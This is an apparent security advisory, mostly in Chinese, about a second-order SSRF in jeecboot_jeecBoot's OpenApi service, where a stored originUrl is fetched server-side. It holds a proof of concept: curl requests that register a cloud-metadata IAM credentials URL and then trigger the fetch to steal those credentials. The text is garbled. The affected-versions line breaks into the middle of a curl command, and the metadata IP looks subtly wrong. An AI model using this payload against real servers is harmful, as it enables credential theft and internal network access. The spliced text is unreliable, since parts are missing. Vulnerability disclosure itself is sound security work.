# [Security] Second-Order SSRF via OpenApi Service in jeecboot_jeecBoot #9554 ## 漏洞概述 这是一个存在于 `jeecboot_jeecBoot` 的 OpenApi 服务中的**二次服务器端请求伪造 (Second-Order SSRF)** 漏洞。 漏洞成因在于 `/openapi/add` 端点缺乏 proper authorization(缺少 `@RequiresPermissions`)和输入验证,允许认证用户将恶意的内部或云元数据 URL 注入到 `originUrl` 字段。当随后调用 `/openapi/call/{path}` 端点时,应用会检索该 URL 并发起出站 HTTP 请求,导致攻击者可以绕过网络分段、扫描内部服务或窃取云凭证。 ## 影响范围 * **受影响版本**: ' \ -d '{ "name": "AWS Metadata", "requestMethod": "GET", "requestUrl": "aws-meta", "originUrl": "http://100.254.169.254/latest/meta-data/iam/security-credentials/", "status": 1 }' # 2. Trigger SSRF curl -X GET "http://target:8080/openapi/call/aws-meta" \ -H 'X-Access-Token: ' ```